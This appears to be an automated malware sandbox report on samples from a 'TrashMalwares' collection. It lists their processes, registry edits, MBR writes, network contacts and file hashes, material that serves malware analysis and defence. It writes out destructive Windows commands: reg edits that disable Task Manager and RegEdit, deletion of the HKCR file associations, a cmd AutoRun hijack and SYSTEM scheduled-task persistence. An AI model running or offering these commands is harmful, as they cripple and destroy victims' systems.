| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = ".txt" | C:\Windows\system32\cmd.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\cmd.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\cmd.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"
C:\Windows\system32\msg.exe
msg * Gosha created by GGmex your computer infected
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\msg.exe
msg * Your desktop has been crashed
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * Your windows infected by gosha :)
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f
C:\Windows\system32\msg.exe
msg * Deleted files
C:\Windows\system32\msg.exe
msg * Your system has been removed...
C:\Windows\system32\msg.exe
msg * Click OK
C:\Windows\system32\cmd.exe
cmd
C:\Windows\system32\reg.exe
reg delete HKCR/.exe
C:\Windows\system32\reg.exe
reg delete HKCR/.dll
C:\Windows\system32\reg.exe
reg delete HKCR/*
C:\Windows\system32\cmd.exe
cmd
Network
Files
memory/2444-4-0x00000000040C0000-0x00000000040C1000-memory.dmp
memory/2444-5-0x00000000040C0000-0x00000000040C1000-memory.dmp
memory/2444-9-0x00000000037B0000-0x00000000037C0000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240220-en
Max time kernel
148s
Max time network
159s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\TrashMalwares-main\\._cache_mbr.exe" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\TrashMalwares-main\\._cache_Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\mbr.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe"
C:\mbr.exe
"C:\mbr.exe"
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe" InjUpdate
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 216.58.204.78:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
Files
memory/1508-1-0x0000000000BA0000-0x0000000001F42000-memory.dmp
memory/1508-0-0x000007FEF5ED0000-0x000007FEF68BC000-memory.dmp
memory/1508-2-0x000000001C480000-0x000000001C500000-memory.dmp
C:\mbr.exe
| MD5 | c85aa1da29f23a5a711e2793d0630b5a |
| SHA1 | e079ef1963a710db2e35380e508eef86ff371fb1 |
| SHA256 | a19c688c6bebe44cc77ecf6bd998bb4f1799cefc91c5bd32cc8d6381e0177139 |
| SHA512 | 162e75f513518d5979f3c4a0e7ca6bf4b4333646bebee73a703c43c67c735f6ed244db25674f786881061418600123e92265e51e9ee5b6d34669ef71b72038cc |
memory/2972-12-0x0000000000220000-0x0000000000221000-memory.dmp
\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe
| MD5 | 578650d2b82375bb0f6be3a9108585b0 |
| SHA1 | 8f25b9a24254c2ec99ee5625c70a0ae7067dc68b |
| SHA256 | 5ee16b324a60878ccef849bec862a4fa551cb304d8ce4056d49df10fb8ec9f2f |
| SHA512 | 4c46d53bab8df399a63b33ac4c4bba2c99663b31fcd3ebb6bd01a9ccf1648a61a7034879fafced99adb9c60388590efb4462e404b9d5da7d8e2e60b480ffc657 |
memory/2556-33-0x0000000000400000-0x000000000043B000-memory.dmp
memory/2972-42-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/2536-45-0x00000000003E0000-0x00000000003E1000-memory.dmp
memory/1628-56-0x0000000000400000-0x000000000043B000-memory.dmp
memory/1508-62-0x000000001C480000-0x000000001C500000-memory.dmp
memory/2536-60-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/1508-64-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-65-0x000007FEF5ED0000-0x000007FEF68BC000-memory.dmp
memory/1508-66-0x000000001C480000-0x000000001C500000-memory.dmp
memory/2536-67-0x00000000003E0000-0x00000000003E1000-memory.dmp
memory/1508-68-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-69-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-70-0x000000001C480000-0x000000001C500000-memory.dmp
C:\rick.wav
| MD5 | 2634c1ac24432e18601bcd8171b8248e |
| SHA1 | 01135b2ace7d4437dd8d57a4dd88b0fd45c5bf35 |
| SHA256 | 66f05a63cc9ae2c641a0fe82ea6ada8142464853dd83b749a562235090adb20d |
| SHA512 | 9fc42b412c9aebb29cf6f0e2969b2c5515086114e44f3d4e259a51ee08824d4f1d25ac2f586d5e8915261191399dc7d53f91a6b897d2d5a756ce2ccabddd7cd3 |
memory/1508-74-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-75-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-76-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-80-0x000000001C480000-0x000000001C500000-memory.dmp
memory/2536-90-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/2536-121-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/1508-139-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-140-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-144-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-147-0x000000001C480000-0x000000001C500000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
165s
Max time network
154s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bootrec.exe" | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe"
C:\Users\Admin\AppData\Local\Temp\bootrec.exe
"C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
Network
Files
memory/2564-0-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2564-1-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-2-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2564-3-0x0000000002520000-0x00000000025A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bootrec.exe
| MD5 | f14b989516f256db1befee3dee508f55 |
| SHA1 | fbd2c6b1d783debb9a69c5766d3672138e24e127 |
| SHA256 | c88dbbd0002395beaeaef3f855790abef3430d76307953825745339bdc1f9388 |
| SHA512 | bfa84b7837d3bcda55571710289092af7e6cb7ee48b21a2a032d24b495ddbe9259c07eeceb58fb2a5ac4482e2b120259fe5b95162eb632228c86516f41bf035e |
memory/2168-11-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2564-12-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2564-13-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-14-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-15-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-16-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-17-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-18-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-19-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-20-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-21-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-22-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-23-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-24-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-25-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-26-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-27-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-28-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-29-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-30-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-31-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-32-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-33-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-34-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-35-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-36-0x0000000002520000-0x00000000025A0000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:36
Platform
win7-20240221-en
Max time kernel
50s
Max time network
80s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Program = "C:\\TEMP\\NetPakoe3.0.exe /autorun" | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2468 wrote to memory of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe | C:\Windows\system32\wscript.exe |
| PID 2468 wrote to memory of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe | C:\Windows\system32\wscript.exe |
| PID 2468 wrote to memory of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe | C:\Windows\system32\wscript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\1362.tmp\1363.tmp\1364.vbs //Nologo
Network
Files
C:\Users\Admin\AppData\Local\Temp\1362.tmp\1363.tmp\1364.vbs
| MD5 | 36072dc09cf0a99e3936b50bacd9a3e5 |
| SHA1 | 731ede51ad7869ae0b01248267b0354a5fe52cba |
| SHA256 | a8dd0c012506f5ec41f90909e88de316ce3cbdb294db2b925c832af104e8b94f |
| SHA512 | c4d9858e67295ef124218e2493e9990427df16bc722df621ffebbcc4229e270f42fbccd9a2376448c19319ab18c1982f6d9a7371a77c148d434a64b8fe0a874d |
Analysis: behavioral8
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win10v2004-20240226-en
Max time kernel
148s
Max time network
143s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Anatralier.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\mbrwriter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\mlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\mousedraw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\ATohou.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\circle.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\AWave.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\reds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\cubes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\scl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\PatBlt3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\txtout2.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\B882.tmp\mbrwriter.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Anatralier.exe
"C:\Users\Admin\AppData\Local\Temp\Anatralier.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B882.tmp\B883.bat C:\Users\Admin\AppData\Local\Temp\Anatralier.exe"
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mbrwriter.exe
mbrwriter.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\1.exe
1.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mlt.exe
mlt.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mousedraw.exe
mousedraw.exe
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2ec 0x3a0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4084 --field-trial-handle=2432,i,12161922670941700748,3348345705955601576,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\taskkill.exe
taskkill /f /im 1.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im mlt.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\ATohou.exe
ATohou.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\circle.exe
circle.exe
C:\Windows\system32\timeout.exe
timeout 30
C:\Windows\system32\taskkill.exe
taskkill /f /im circle.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im ATohou.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\AWave.exe
AWave.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\reds.exe
reds.exe
C:\Windows\system32\timeout.exe
timeout 40
C:\Windows\system32\taskkill.exe
taskkill /f /im AWave.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im reds.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\bytebeat.exe
bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\cubes.exe
cubes.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\scl.exe
scl.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\PatBlt3.exe
PatBlt3.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\txtout2.exe
txtout2.exe
C:\Windows\system32\timeout.exe
timeout 60
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\B882.tmp\B883.bat
| MD5 | 9bbf761a8af3bc468e81625de8a66776 |
| SHA1 | af48afce2581501b5f8a1b949fe6f12145256653 |
| SHA256 | e0392f29af97bada38428aff5574776a44cb757c6ef8a7cfe9c93b86e8d61d5c |
| SHA512 | cce724b5ede94b729767b449b29082399b8d041e5fb51b75164807ae0d249eac0fb17aaec43e0077493ee8b5c03b6d9f89f050e063c8b0009fa7beefdb329e66 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\prompt.vbs
| MD5 | 7d598596e9af07501ca9f98f5d32166e |
| SHA1 | 21c748745a9c2f98ee88cfeb9d3d0d77523a0aa0 |
| SHA256 | 4f641829a7a076a5c5d77e4561779d62a3dded791fbf52e10bcbd0c3045ad402 |
| SHA512 | a63cceb82d70810feaf94c85123f8f861f59b918b9168d43efb6ef2ba8e82ed410718d540a2fa0d74aecfd40dda1c23e25563c52fe69b80407c31a661b81a561 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mbrwriter.exe
| MD5 | e2b95fc712d453a57101f9867d384d2c |
| SHA1 | 993eb1acb51ad2ab2e280d3729a56817a3097085 |
| SHA256 | e505465cef9e734ef29dd9803c848960a55dc6c35fa4bf8c275336d2119ddc62 |
| SHA512 | 25a4b6cc6d8908933ef13737aabe0bd56c1356b5f98bfe3e09c6b92fb358a1a65e35549e2d624574fda23fc91731091f0a80eeb9dc5ca2c1d96ba9a88fd5f109 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\1.exe
| MD5 | a14ba46ecdc37d9e73efd734b0ab4db9 |
| SHA1 | 9e72f4b89d2643110b2e3efc80c14222a5e00014 |
| SHA256 | 94aa578b5c5fe98f2f8e81705fff8addab6f2f4c2749778ef942b1cfab5b6aa8 |
| SHA512 | 432bbda373fb97bef1a1a8a7292eb85f70cb7866741bf000d5775a6a9a261124ab24b3e053a6f4726a5b3e48d5c5de4f86deb24ea25265dd0945b9740156268b |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mlt.exe
| MD5 | bc183f5854488a0774969ec19b492153 |
| SHA1 | 2e08a1bbf1b09d989f86b80ce5cdc4f22dc65ad5 |
| SHA256 | 4b97506ae7118dea78e251492166888732815f5cdc90b9c56de2f9ee3862b20f |
| SHA512 | 25a0d999d5d620f48e8d4bc1cb59013ecb5d33250d72e23211e5348fb38573cb3ec82a8370547b59bde9c4d7e555ec7f1dd48c284eabf0f33b595e562f4d3780 |
memory/1180-56-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mousedraw.exe
| MD5 | f7db0edd465e545dcd947f4beef32779 |
| SHA1 | a02d2dcbe4ea1146b726a6191354340f8dd41f6a |
| SHA256 | 9bbce9c9e1b513084b8a206e935b2512a341fd81688e71735ef27511d0378d47 |
| SHA512 | 6d40cf365a30277328f9103083e939ac8fedf860ffef6d0c5bd80d708e0f73d606f456d37aa1fa5e69964ac2e20c263fbaa755a9c28eff962395e3509a7a4e25 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\1.wav
| MD5 | 8c5007acc14fc8fd7aa7dc659e30ebb5 |
| SHA1 | 91025f286d71dd7821989c24f752369c360386ba |
| SHA256 | bcfd13d3f19003f29e2ebf48a696972a427ba53c7d93f59340431d00e550c30e |
